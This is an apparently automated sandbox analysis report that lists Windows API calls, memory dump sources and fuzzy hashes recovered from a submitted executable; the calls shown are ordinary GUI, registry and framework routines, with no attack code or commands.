                                                                  • CopyRect.USER32(?,?), ref: 002123EA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$CopyInfoOffsetParametersSystemWindow
                                                                  • String ID: ,
                                                                  • API String ID: 401166719-3772416878
                                                                  • Opcode ID: 4dc4878bea8727b65efc9a9a5a98cfc19f46874c774bf6d497df1dbd9c67587c
                                                                  • Instruction ID: c0a2b27cd3539b23a7b0086b990179556c1a31ba87f3a85c1a1ac151cfebae3f
                                                                  • Opcode Fuzzy Hash: 4dc4878bea8727b65efc9a9a5a98cfc19f46874c774bf6d497df1dbd9c67587c
                                                                  • Instruction Fuzzy Hash: 83210471A0020AABDF14DFE4D889FEEBBB9AB58310F140069F505A7150DB71A965CB61
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(COMCTL32.DLL), ref: 0020466E
                                                                  • GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 0020467E
                                                                  • _memset.LIBCMT ref: 00204697
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AddressException@8H_prolog3HandleModuleProcThrow_memset
                                                                  • String ID: COMCTL32.DLL$TaskDialogIndirect
                                                                  • API String ID: 2638756577-244319309
                                                                  • Opcode ID: 08fb04d64b0f9e4f6e86345e7717bbd27c14d8be6b9b67a944b4e5896545a021
                                                                  • Instruction ID: 2824d7d49b3c33f7d984f9034613ffcf30f21a19faf2ddf1918fc1c298b54611
                                                                  • Opcode Fuzzy Hash: 08fb04d64b0f9e4f6e86345e7717bbd27c14d8be6b9b67a944b4e5896545a021
                                                                  • Instruction Fuzzy Hash: AF118FB2910309ABCB10EFA4CC45FCE77FCAB45714F108125B609E7181EB70DA54CBA1
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001C70DF
                                                                  • std::exception::exception.LIBCMT ref: 001C7118
                                                                    • Part of subcall function 002BCB3D: std::exception::_Copy_str.LIBCMT ref: 002BCB58
                                                                  • __CxxThrowException@8.LIBCMT ref: 001C712D
                                                                    • Part of subcall function 002BF7E9: RaiseException.KERNEL32(001CA2E2,?,00000000,?,001CA2E2,?,?,001C106C,00000000), ref: 002BF82B
                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001C7134
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                                                                  • String ID: \*1
                                                                  • API String ID: 73090415-2756887252
                                                                  • Opcode ID: 38f836b3f4b3a4ba8d91afdb6dad4949c6cf3cacd6f99d36f43ad46885136bb4
                                                                  • Instruction ID: 76a325c3bd1d4de15eaf4c09e9c086c39501b4c26a3a3276480b939c936169c4
                                                                  • Opcode Fuzzy Hash: 38f836b3f4b3a4ba8d91afdb6dad4949c6cf3cacd6f99d36f43ad46885136bb4
                                                                  • Instruction Fuzzy Hash: 331190B2815748AFC721DF59C880ADBFBF8FB18700F40866EE45593641DB30A604CBA4
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(DWMAPI), ref: 001E0FF0
                                                                  • GetProcAddress.KERNEL32(00000000,DwmSetIconicThumbnail), ref: 001E1000
                                                                  • DeleteObject.GDI32(00000000), ref: 001E103A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AddressDeleteHandleModuleObjectProc
                                                                  • String ID: DWMAPI$DwmSetIconicThumbnail
                                                                  • API String ID: 3128169092-3761315311
                                                                  • Opcode ID: 38362263ab6b0c4f71c05b2fd56c511427e974d3c828d8dedaefcd4b77d09202
                                                                  • Instruction ID: 691f2441175caf8697a86cfb4fdd9ed22f3c697f82d576962072a0ea2de24d66
                                                                  • Opcode Fuzzy Hash: 38362263ab6b0c4f71c05b2fd56c511427e974d3c828d8dedaefcd4b77d09202
                                                                  • Instruction Fuzzy Hash: C601D231240785BBDB215F668C88EAEB7ACFF49710F004065F815A7241DFB4DD40CBA0
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 001DCFBD
                                                                  • GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 001DCFCD
                                                                  • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 001DD00C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCreateFileHandleModuleProc
                                                                  • String ID: CreateFileTransactedW$kernel32.dll
                                                                  • API String ID: 2580138172-2053874626
                                                                  • Opcode ID: f037413685dfcac147477c2ba1d59d9756ae01a8ccab2987ca689532d13b7a18
                                                                  • Instruction ID: 16568feff6f49f74584dcac39e7619c2dbd1fa4a873bd11ee10cc8c868d1ba51
                                                                  • Opcode Fuzzy Hash: f037413685dfcac147477c2ba1d59d9756ae01a8ccab2987ca689532d13b7a18
                                                                  • Instruction Fuzzy Hash: FC01DE3204014AFB8F220F95EC04C9A7F3AEBD9B50B154616FA6595160C732C872EBA0
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 001D191F
                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001D192F
                                                                    • Part of subcall function 001D18A2: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 001D18B6
                                                                    • Part of subcall function 001D18A2: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 001D18C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Advapi32.dll$RegDeleteKeyExW
                                                                  • API String ID: 1646373207-2191092095
                                                                  • Opcode ID: cd0be6e35e85e2e960d1b52e8c5a17d1b2ea158990d38406fc23234bd24f4115
                                                                  • Instruction ID: a365854d706de8135e02a799c50316b4da4549e257f00e54c3a25963883db548
                                                                  • Opcode Fuzzy Hash: cd0be6e35e85e2e960d1b52e8c5a17d1b2ea158990d38406fc23234bd24f4115
                                                                  • Instruction Fuzzy Hash: 67F0F431140280FFEF265F51ECA8B557F99EB05754F00442AF58AD6260CB329950D711
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 00241D68
                                                                  • GetWindowRect.USER32(?,?), ref: 00241E40
                                                                  • InflateRect.USER32(?,00000000,?), ref: 00241E66
                                                                  • GetWindowRect.USER32(?,?), ref: 00241F1B
                                                                  • GetWindowRect.USER32(?,?), ref: 00242026
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$Inflate
                                                                  • String ID:
                                                                  • API String ID: 1123775244-0
                                                                  • Opcode ID: 4988d7347d937d8391ec052fb2c3ef37a86d88e4f15bb36a129dd6b845e1e17a
                                                                  • Instruction ID: c2df8d97491c3dcbbea0db85edaaa40ec4aa9113b9208b2949cdbab7d094a6e1
                                                                  • Opcode Fuzzy Hash: 4988d7347d937d8391ec052fb2c3ef37a86d88e4f15bb36a129dd6b845e1e17a
                                                                  • Instruction Fuzzy Hash: C4E12971E1020ADFCB18DFA9C984AAEBBF5FF48300F644569E915A7240D770ADA4CF90
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00218CA8
                                                                  • GetWindow.USER32(?,00000005), ref: 00218D4D
                                                                  • SendMessageW.USER32(?,00000229,00000000,00000000), ref: 00218D68
                                                                  • GetParent.USER32(?), ref: 00218ECC
                                                                  • SendMessageW.USER32(?,00000222,00000000,00000000), ref: 002190A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$H_prolog3_ParentWindow
                                                                  • String ID:
                                                                  • API String ID: 3554438227-0
                                                                  • Opcode ID: a509f82cfcce5e437fd8285b56d7863758e4854040a17713b5f1b3fbda59104b
                                                                  • Instruction ID: c27e02bfcf7a1dd3c48e9792da3911a6ca287048ecd196e358d40bd018b2b596
                                                                  • Opcode Fuzzy Hash: a509f82cfcce5e437fd8285b56d7863758e4854040a17713b5f1b3fbda59104b
                                                                  • Instruction Fuzzy Hash: 6FD16871A102199FCF15EFE4C895BEDB7FAAF68310F14012AF506AB291DB709D82CB51
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Empty$Client
                                                                  • String ID:
                                                                  • API String ID: 1457177775-0
                                                                  • Opcode ID: 368fdcd1ac5f629ee5aa2207dcafbb2c7ad195073cebceab2cc1f8ea435a694b
                                                                  • Instruction ID: b00bf3f8a50b8f0946aba6f22553f9d5e2b9cfe8b3da14f7610f2ae270b14c86
                                                                  • Opcode Fuzzy Hash: 368fdcd1ac5f629ee5aa2207dcafbb2c7ad195073cebceab2cc1f8ea435a694b
                                                                  • Instruction Fuzzy Hash: 12D10931D00A4ACFCF19CFA9C9805AEB7F2BF55314F244569E819AB290DB75AD41CF90
                                                                  APIs
                                                                  • IsWindow.USER32(?), ref: 001FBCF9
                                                                  • GetParent.USER32(?), ref: 001FBD18
                                                                  • GetParent.USER32(?), ref: 001FBD27
                                                                    • Part of subcall function 001DEEAA: SetParent.USER32(?,?), ref: 001DEEBD
                                                                  • GetWindowRect.USER32(?,?), ref: 001FBDBE
                                                                  • GetClientRect.USER32(?,?), ref: 001FBE37
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Parent$RectWindow$Client
                                                                  • String ID:
                                                                  • API String ID: 3043635113-0
                                                                  • Opcode ID: a65e7d9a610e1072e720ae11269f0c1a8de0dcaf78cefa90054412d75e869b9a
                                                                  • Instruction ID: a7023c3f42f997e752845bae77646905783a63dfeae63286bcce7327240f701e
                                                                  • Opcode Fuzzy Hash: a65e7d9a610e1072e720ae11269f0c1a8de0dcaf78cefa90054412d75e869b9a
                                                                  • Instruction Fuzzy Hash: 90712970700604AFCB14AF65C8D8EAEBBFAAF89700F1505BDF506DB292CB719804CB51
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 0020F62A
                                                                  • InflateRect.USER32(?,00000000,00000000), ref: 0020F656
                                                                  • GetSystemMetrics.USER32(00000002), ref: 0020F6D3
                                                                  • _memset.LIBCMT ref: 0020F6F9
                                                                    • Part of subcall function 001DCDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,001D8A00,?,001D8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 001DCE0F
                                                                    • Part of subcall function 001D6F29: GetScrollInfo.USER32(?,?,?), ref: 001D6F5D
                                                                    • Part of subcall function 001D6EE9: SetScrollInfo.USER32(?,?,?,?), ref: 001D6F1A
                                                                  • EnableScrollBar.USER32(?,00000002,00000000), ref: 0020F7DC
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Scroll$InfoRect$ClientEnableInflateMetricsSystemWindow_memset
                                                                  • String ID:
                                                                  • API String ID: 4263531605-0
                                                                  • Opcode ID: b88c5c1b5b49e5d06f80e31c9a1c7ff0d5bc02caca8b3ebcfa0f23f480350d24
                                                                  • Instruction ID: 5e73106e5132e14f19d302f8a13647676e396a258469249aa269d0ceb17c398b
                                                                  • Opcode Fuzzy Hash: b88c5c1b5b49e5d06f80e31c9a1c7ff0d5bc02caca8b3ebcfa0f23f480350d24
                                                                  • Instruction Fuzzy Hash: CE613A71A5121AEFDB10CFA8C984AEDB7B9FF48700F14047AE809AB296D7B15D11CF61
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 00241BAD
                                                                  • EqualRect.USER32(?,?), ref: 00241BD8
                                                                  • BeginDeferWindowPos.USER32(?), ref: 00241BE5
                                                                  • EndDeferWindowPos.USER32(?), ref: 00241C0A
                                                                    • Part of subcall function 0023C83F: GetWindowRect.USER32(?,?), ref: 0023C855
                                                                    • Part of subcall function 0023C83F: GetParent.USER32(?), ref: 0023C897
                                                                    • Part of subcall function 0023C83F: GetParent.USER32(?), ref: 0023C8A7
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  • GetWindowRect.USER32(?,?), ref: 00241CBF
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$DeferParent$BeginEqualException@8H_prolog3Throw
                                                                  • String ID:
                                                                  • API String ID: 601628497-0
                                                                  • Opcode ID: e938d675725a65f5cf397ba0684ada18a20d7380861ec402862ba39f27c299a9
                                                                  • Instruction ID: 14548cc5dd5d96d00b1f4d7646c5818cf072e8805dd11a8fd2afeb33e567af92
                                                                  • Opcode Fuzzy Hash: e938d675725a65f5cf397ba0684ada18a20d7380861ec402862ba39f27c299a9
                                                                  • Instruction Fuzzy Hash: 5B513871A502099FCB14DFA9C9C49EEBBF9FF48310B24416AE505B7210DB70AEA0CF65
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 002A1512
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 002A1560
                                                                  • GetBoundsRect.GDI32(?,002A1A89,00000000,00000000), ref: 002A1588
                                                                  • CreateSolidBrush.GDI32 ref: 002A15A2
                                                                  • FillRect.USER32(00000000,002A1A89,?), ref: 002A15BB
                                                                    • Part of subcall function 002A08C5: FrameRgn.GDI32(00000000,?,00000000,002A1A89,0000003C), ref: 002A08ED
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CreateRect$BoundsBrushCompatibleFillFrameH_prolog3_Solid
                                                                  • String ID:
                                                                  • API String ID: 2864772683-0
                                                                  • Opcode ID: 79483e3a39f2c46e1a0ff7c0c883bc657116428b4776a5da63c3da7eaa7ac48c
                                                                  • Instruction ID: c5802edc0af409daf74b938d4d7493db84bb6c1bf0b6eea8458fc12dbc299f44
                                                                  • Opcode Fuzzy Hash: 79483e3a39f2c46e1a0ff7c0c883bc657116428b4776a5da63c3da7eaa7ac48c
                                                                  • Instruction Fuzzy Hash: FD515F71C20219EFCF11DF94D885AEDBBB9FF19710F08002AF805AA251CB715AA5CFA4
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 002132DB
                                                                  • RedrawWindow.USER32(?,?,?,00000541), ref: 002134A1
                                                                    • Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09
                                                                  • GetSystemMenu.USER32(?,00000000), ref: 00213315
                                                                  • IsMenu.USER32(?), ref: 00213334
                                                                  • IsMenu.USER32(?), ref: 00213342
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Window$H_prolog3LongRedrawSystem
                                                                  • String ID:
                                                                  • API String ID: 1445310841-0
                                                                  • Opcode ID: b9a616bac8761d63f36a084a5051216f8811115cd60bae3edcb1fa8d779e08b0
                                                                  • Instruction ID: 7cce0373c483d48d37868e63fe4e2f8cd6b1874d83df1e9fcc9397a1e4e74532
                                                                  • Opcode Fuzzy Hash: b9a616bac8761d63f36a084a5051216f8811115cd60bae3edcb1fa8d779e08b0
